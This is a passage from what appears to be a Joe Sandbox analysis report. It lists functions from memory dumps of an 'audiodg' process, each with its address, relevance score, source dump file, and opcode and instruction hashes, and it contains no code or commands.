                                  • Instruction Fuzzy Hash: 1851C331B18A994FDB58DF5888645B977D2FFE8300F15457ED46AC7296CE34E802CB81
                                  Function 00007FFD9BAB35B5 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ee8968f61e82990d32bb58f719dccdea5ad8383aa6b2519b2750e3d0342a1f3
                                  • Instruction ID: 0b6e42b07b2f277be3cf5afff6e2db20b37a2830d1e6f5e6b4b3fa7765661d9d
                                  • Opcode Fuzzy Hash: 0ee8968f61e82990d32bb58f719dccdea5ad8383aa6b2519b2750e3d0342a1f3
                                  • Instruction Fuzzy Hash: D251D331A1994E8FEB58EB68C875ABD7BE1FF19304F4002BAD01DC72D6CE7468418B00
                                  Function 00007FFD9BAB3205 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de345134966d9728313646dd909466d00524bb5ffb8ef821bd54e4e4de285a15
                                  • Instruction ID: 1e6782475be8637a9ebaeb452746a0b7037bc783a8af5722f32018e4d65cd731
                                  • Opcode Fuzzy Hash: de345134966d9728313646dd909466d00524bb5ffb8ef821bd54e4e4de285a15
                                  • Instruction Fuzzy Hash: 97512C71E0A61D8FEB64EB94C4646EDB7F1EF58310F51417AD029E71A2DE786A44CF00
                                  Function 00007FFD9BAB371F Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1081c2f9106c9d900fb7cd057835904f60092b4b6e4d0778a17234f42dd2968
                                  • Instruction ID: 2fd52127c386d12d4d2b2b67fc485e564d000e43b4f0f656a90e7ca84ad9a4cb
                                  • Opcode Fuzzy Hash: d1081c2f9106c9d900fb7cd057835904f60092b4b6e4d0778a17234f42dd2968
                                  • Instruction Fuzzy Hash: 8A41A1B1A1990D8FE758DB6CC8253A87BE5EF9A324F5042BED019C72DACBF518458B40
                                  Function 00007FFD9BAB32D6 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70655b4223eee51657be94850cd8e782d00f768fd3f45a2d56565090ec819a7f
                                  • Instruction ID: 7f520a875d9ce8e830c97f605874b56cc7d6b12a0725d6d7fad0a1ec150e6a4e
                                  • Opcode Fuzzy Hash: 70655b4223eee51657be94850cd8e782d00f768fd3f45a2d56565090ec819a7f
                                  • Instruction Fuzzy Hash: 1321F771E0952D8FEB64EB98C4A4AEDBBF1FF58310F55417AD019E72A1CA786980CF40
                                  Function 00007FFD9BAB3408 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59f1ead569d4378090950fff45207ebd567e40b35d5b1e2788c74aa7d4196feb
                                  • Instruction ID: 0413f8f4ef39084d4d6aee6a5c93d75e2e01ac8c2bc687006b8856b22eef64b2
                                  • Opcode Fuzzy Hash: 59f1ead569d4378090950fff45207ebd567e40b35d5b1e2788c74aa7d4196feb
                                  • Instruction Fuzzy Hash: 37219F3094E69A8FD757ABB488686A97FF0FF06310F0504FBD059CB0B2DA789545CB11
                                  Function 00007FFD9BAB0A01 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eef7ae21081c15f32454093c7c42227835d72b0898bd34e16de12817e2be4cd7
                                  • Instruction ID: d980b429f3898f2bf885f75cff850fcf18551fbcfd3a14f7755f80219f04a29c
                                  • Opcode Fuzzy Hash: eef7ae21081c15f32454093c7c42227835d72b0898bd34e16de12817e2be4cd7
                                  • Instruction Fuzzy Hash: 7011C471E1A51E4FE7A0EBA8C8695FD7BE0FF58700F4149BAD42CC70A6EE74A5408B40
                                  Function 00007FFD9BAB117D Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7204fb5f0f027565228e32a59d05347a25145355d2be6370e3a7dc96a853194
                                  • Instruction ID: d2a61c7b2892ebbb2e38b3d238675d5783bcf091f4c96441e42709e7464e1b90
                                  • Opcode Fuzzy Hash: e7204fb5f0f027565228e32a59d05347a25145355d2be6370e3a7dc96a853194
                                  • Instruction Fuzzy Hash: 9311C870A1E65E4FEBA9DBA484692F97BE0FF65300F01047FD02DC60E2EA756644CB00
                                  Function 00007FFD9BAB3535 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56952e8678cf04f300d73139a33c0a1f6a3721456493cbc0cd3409461e963ca3
                                  • Instruction ID: b05d5c7a03e47891b6726f0572705c9f38837d8a04c124b9cd674cc33001fc7b
                                  • Opcode Fuzzy Hash: 56952e8678cf04f300d73139a33c0a1f6a3721456493cbc0cd3409461e963ca3
                                  • Instruction Fuzzy Hash: 31118230A0965E8FDB58EFA4C8696BD7BE0FF18300F0105BFD429C21A2DB74A5408B00
                                  Function 00007FFD9BAB22A1 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d33a2460c875f8d56828bdc1fe5f6eeeaf32c11ecb19f40acd1d89522a41de3e
                                  • Instruction ID: a0ff5d10c614d129208d0aaad26d0f209593beb09904f6294e63ab55bca95ff3
                                  • Opcode Fuzzy Hash: d33a2460c875f8d56828bdc1fe5f6eeeaf32c11ecb19f40acd1d89522a41de3e
                                  • Instruction Fuzzy Hash: 7201B530A0A65D8FE761FBB484695A97BE0EF56300F4244B7D428C70A6EE74E5808B01
                                  Function 00007FFD9BAB05D8 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1b84c1a44ecdd0c586af21657b21d10f43f472f6b223483c55a528a77e78013
                                  • Instruction ID: f3ca34aa6a2d18ccca2bb5f525abbd9a8443c2ad9461b6868d0d6f875cd1e123
                                  • Opcode Fuzzy Hash: a1b84c1a44ecdd0c586af21657b21d10f43f472f6b223483c55a528a77e78013
                                  • Instruction Fuzzy Hash: F1019E30A1951E8FDB98EF64C4656BA77A1FF68304F21447ED42EC31A4CE75A650CF40
                                  Function 00007FFD9BAB0B15 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21e27fd0a7b4b3d25a71b7e10f8982444833876f22baab35ac6d110288e695b0
                                  • Instruction ID: 4f6707772c56ab9b65433f630783342eafccf3c32dbcc2ce151e445c2de1c3ca
                                  • Opcode Fuzzy Hash: 21e27fd0a7b4b3d25a71b7e10f8982444833876f22baab35ac6d110288e695b0
                                  • Instruction Fuzzy Hash: 9301D230E1A55E4FE770EF6488685A97BE1FF09304F4245BAD428C70B2EE74E2408B04
                                  Function 00007FFD9BAB2F11 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5205ac864eae15b2ecbea89c60bd2fe644967bc41016134fa6e7580d6fef3ad5
                                  • Instruction ID: cde9ba4709fb82d7cfa74a8c5c6aa5a71474a129990ce032bc1cea0db3593958
                                  • Opcode Fuzzy Hash: 5205ac864eae15b2ecbea89c60bd2fe644967bc41016134fa6e7580d6fef3ad5
                                  • Instruction Fuzzy Hash: 8701D470E1A65E8FE761EBB484695A97FE0EF19300F4249B7D41CC70B2EE74E2548B01
                                  Function 00007FFD9BAB28ED Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55122892e4d92f4600cb2ae167789220fa85fb096f837fcbd3c56387245945f6
                                  • Instruction ID: 72e65e13dc594923d636655cba3fcac1063380079c0c11f323121b947b99a960
                                  • Opcode Fuzzy Hash: 55122892e4d92f4600cb2ae167789220fa85fb096f837fcbd3c56387245945f6
                                  • Instruction Fuzzy Hash: B5017131E1A65E4FE765ABA484686B97FE0EF19300F4245B7D42CC60B6EA74E5408B41
                                  Function 00007FFD9BAB2F89 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8305dd9f5b63b10321284b8e3ecc0748975396df36f3a5960641dbb1d18ab051
                                  • Instruction ID: a1bb8f008af0e26a3d312130ed489b50d037b5281b2f526e37ec1532e06b2743
                                  • Opcode Fuzzy Hash: 8305dd9f5b63b10321284b8e3ecc0748975396df36f3a5960641dbb1d18ab051
                                  • Instruction Fuzzy Hash: C001D470A4E75D4FE762A7B488695A97FE0EF05300F0648F7C418CB0B6DA78A6688B01
                                  Function 00007FFD9BAB0610 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7e866ffe36169939639345d07332b768321ed35ae9361dce321543bbec3882e
                                  • Instruction ID: c13665afedead29155e1e90297b1fd1b9e4943f012d7f5272d7dbc2bc882a118
                                  • Opcode Fuzzy Hash: c7e866ffe36169939639345d07332b768321ed35ae9361dce321543bbec3882e
                                  • Instruction Fuzzy Hash: 58016230A19A1E8AEB58EBE4D4685B977A0FF18305F11447FD42EC21E5DF76A650CA00
                                  Function 00007FFD9BAB0608 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 350926d010d560720c3a786638d082cc18100ffd61d6345caed5a4949d18ee3d
                                  • Instruction ID: 19e604985de05ec61e31734445f28e9e0cdb544ad9d00b2bc326da6806a19bf9
                                  • Opcode Fuzzy Hash: 350926d010d560720c3a786638d082cc18100ffd61d6345caed5a4949d18ee3d
                                  • Instruction Fuzzy Hash: BE016D30A1960E8BEB69EFE4D4696BD77A0FF18305F1148BED42EC21E5DE75A250CA00
                                  Function 00007FFD9BAB1CED Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29120ffe19a5c1f7396d906e767a2617e8d6f74e3e2cd18e182ab6bb23e2cdc9
                                  • Instruction ID: dfa302b252dbe53d9f37efd329f01282d32c29925bc1605edd381a5fbaf87e26
                                  • Opcode Fuzzy Hash: 29120ffe19a5c1f7396d906e767a2617e8d6f74e3e2cd18e182ab6bb23e2cdc9
                                  • Instruction Fuzzy Hash: 4601D630A1A68E8FDB949F54C4652B97BA0EF65304F51007AE82CC21A1DAB99550CF80
                                  Function 00007FFD9BAB05D0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4737059aebf4cf40c5f7f0d8ae0f77f926e6e6f5ae988af59251a37222c3825e
                                  • Instruction ID: acda37ccfd70169c29112468d248a6ecfbc1a280f66c0436829149641b95fd50
                                  • Opcode Fuzzy Hash: 4737059aebf4cf40c5f7f0d8ae0f77f926e6e6f5ae988af59251a37222c3825e
                                  • Instruction Fuzzy Hash: DEF0FC30A1A55E8FDB94EF64C4256FA7790EF25309F11047AE82DC30D1CE75A550CF80
                                  Function 00007FFD9BAB1190 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34ac0740d995dd8a91d1455d59aa6259cf037c50cc7669b9be93fde98637d71e
                                  • Instruction ID: a32cbdc71bd14bb255ab869f789c55167bf6b442656c395edcc7f7b790232549
                                  • Opcode Fuzzy Hash: 34ac0740d995dd8a91d1455d59aa6259cf037c50cc7669b9be93fde98637d71e
                                  • Instruction Fuzzy Hash: 88F0C830E2A56F49FBA49BA898692BA76E4FF65305F00053FD42DC20E1EEB812548A40
                                  Function 00007FFD9BAB2809 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b71ea8c773ff1832057166b3e124df531d8811f9d8a0db876224e83e65cc6011
                                  • Instruction ID: 999ee21b004e34614e490ef0da01da9ab5e2571b47439286f284e106fe5560db
                                  • Opcode Fuzzy Hash: b71ea8c773ff1832057166b3e124df531d8811f9d8a0db876224e83e65cc6011
                                  • Instruction Fuzzy Hash: 27F0C83190E38D4FD7699FB088651E93F60AF55200F4604FBD428C60F2DA789544CB01
                                  Function 00007FFD9BAB287D Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d64c4ec3925342a6952e55d3a4b7aad769ca2d63424e8c7ae5ac533f9638e82
                                  • Instruction ID: b80c4b4005e1938b44ccea2cf69f6d0e58fb5af2b1b4e56d64fcef1a904a3d0f
                                  • Opcode Fuzzy Hash: 6d64c4ec3925342a6952e55d3a4b7aad769ca2d63424e8c7ae5ac533f9638e82
                                  • Instruction Fuzzy Hash: D9F0F03091A78E8BEB689FA084282F93FA0FF15300F4100BFE428C50E2DB79A5508B00
                                  Function 00007FFD9BAB5C06 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2665570420.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction ID: 0b64b2d99a5c667166bb96b7af1adc213228b20c66434f60ac27826e1aa621f8
                                  • Opcode Fuzzy Hash: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction Fuzzy Hash: 38F0D4B0D0952D8EDBA4DB088894BE9B7B1FB59300F1000EEC20DE32A1DA305A80CF04

                                  Executed Functions

                                  Function 00007FFD9BAAD668 Relevance: .6, Instructions: 550COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f62462e18452c5f4e518d121eba566db30f55d32f74eeeb4473df747568dd00
                                  • Instruction ID: 5247b79ffcf51f82df9b959074d88b6c19783106a601701c95081eff7fe34865
                                  • Opcode Fuzzy Hash: 1f62462e18452c5f4e518d121eba566db30f55d32f74eeeb4473df747568dd00
                                  • Instruction Fuzzy Hash: 50128E31E1964D8FEB99EF68C8647B8BBB2FF19304F0501BAD08DD71A2CA746940CB11
                                  Function 00007FFD9BAAC240 Relevance: .5, Instructions: 549COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aeb11e146879d99a632dff303fd2b745d40dfcaf1b2a1d6b4c3f61b617f3218c
                                  • Instruction ID: 2b64ea3e3fd7141abd7723084fdfa53582b1591d6526be66d72b8b6677480b30
                                  • Opcode Fuzzy Hash: aeb11e146879d99a632dff303fd2b745d40dfcaf1b2a1d6b4c3f61b617f3218c
                                  • Instruction Fuzzy Hash: 03024531A0E68A4FE766AB689C251F93BB0FF06325F0501BBD449CB0A3EA7C6545C761
                                  Function 00007FFD9BAAA71D Relevance: .3, Instructions: 328COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5dc831a9a37445633440ef7b89e51e278862643484b308aa4c68d8e5d99de12
                                  • Instruction ID: 14b9faf449043e09bb59b83eb8a1656a3bbbf921eec100b8f1936b582482d3e7
                                  • Opcode Fuzzy Hash: d5dc831a9a37445633440ef7b89e51e278862643484b308aa4c68d8e5d99de12
                                  • Instruction Fuzzy Hash: 2BB1D130A0A68E8FD756EB64C8686F9BBF1FF19304F0645BBD419C70A2DB78A644C711
                                  Function 00007FFD9BAB10A7 Relevance: 5.1, Strings: 4, Instructions: 139COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$$$/$]
                                  • API String ID: 0-2504117364
                                  • Opcode ID: b59d1949870786f003f8f4523fba80cabab213bd7a078ce976d9d3d303b56afe
                                  • Instruction ID: 4260cf41e7a4a69eaf1ecbb33e808bfd6596eaf852f1b7c24c13287c2d6ad79f
                                  • Opcode Fuzzy Hash: b59d1949870786f003f8f4523fba80cabab213bd7a078ce976d9d3d303b56afe
                                  • Instruction Fuzzy Hash: 3C51C570E1522DCFEB68DF94D8A4BECB6B1BB54300F1140AED05EA7291CB785A84DF10
                                  Function 00007FFD9BAB1000 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,$/
                                  • API String ID: 0-2486155881
                                  • Opcode ID: c06af0a8c8d04acc0fdc00cb82dccdc580a927868a7685fe6e233d393f874c64
                                  • Instruction ID: 2c6cc7335f607270d378796702749891b0687c83002f36f8637b9ea7623dd363
                                  • Opcode Fuzzy Hash: c06af0a8c8d04acc0fdc00cb82dccdc580a927868a7685fe6e233d393f874c64
                                  • Instruction Fuzzy Hash: 9D21DA30E1966D8AEB68DF54D864AED73B1FB55305F1102BEC41DA7294CB745A80CF04
                                  Function 00007FFD9BAB3243 Relevance: .4, Instructions: 450COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33948af4cd1b0dcbd8ef084157a4292eb74d40f82fa26b9067377612b2992399
                                  • Instruction ID: 4e1e41a32bd71c764b8b3f84bbfa99126699e565b064f1efa3f54a6ebb455db3
                                  • Opcode Fuzzy Hash: 33948af4cd1b0dcbd8ef084157a4292eb74d40f82fa26b9067377612b2992399
                                  • Instruction Fuzzy Hash: EA119471E0E69E4FE752EB6888699A97BF0EF16300F0545F7D068C70B3DA64A5048B11
                                  Function 00007FFD9BAAC418 Relevance: .4, Instructions: 362COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4991149737b4c655734639a66c4f35c0b1e3be9b656c6d53c64cdbc19bf1fae
                                  • Instruction ID: 01645b8f1cfccfd7259b8f106472c3bff34b25d9705d8d2298610e8add9d01a9
                                  • Opcode Fuzzy Hash: d4991149737b4c655734639a66c4f35c0b1e3be9b656c6d53c64cdbc19bf1fae
                                  • Instruction Fuzzy Hash: 7FC14631A0D65A8FE765BB6C9C241F93BA0FF1532AF0501B7E459CA0E3EA3C6544C790
                                  Function 00007FFD9BAB3A75 Relevance: .4, Instructions: 356COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b12707f1509d2a3ac1fe57bfe3b1f8da549773dbb5503ef67c8ceb5c53185fc
                                  • Instruction ID: cc2222fa7e73d3467fd2f6dcfb0c62f5f8ee188e745a5883a292bbfae7fb6dc7
                                  • Opcode Fuzzy Hash: 5b12707f1509d2a3ac1fe57bfe3b1f8da549773dbb5503ef67c8ceb5c53185fc
                                  • Instruction Fuzzy Hash: FDE1A570E1966D8EDBA4EF98C8657EDB6F1FF58300F5141BAD01DE32A1DA746A848F00
                                  Function 00007FFD9BAAC498 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e080846f84e70af906b39f44022e23dd4e0b93a99f260ab8ecafbbfa0d4b7719
                                  • Instruction ID: 9479266fd54bf3c3b167aec6d4c134f6ca4ae0a187c0646b6761933f91ef97ee
                                  • Opcode Fuzzy Hash: e080846f84e70af906b39f44022e23dd4e0b93a99f260ab8ecafbbfa0d4b7719
                                  • Instruction Fuzzy Hash: E8B14732A0D65A4FE725FB6CAC245F93BA0EF1532AF0501B7E45DCA0E3EA2C6545C790
                                  Function 00007FFD9BAA0D40 Relevance: .3, Instructions: 289COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
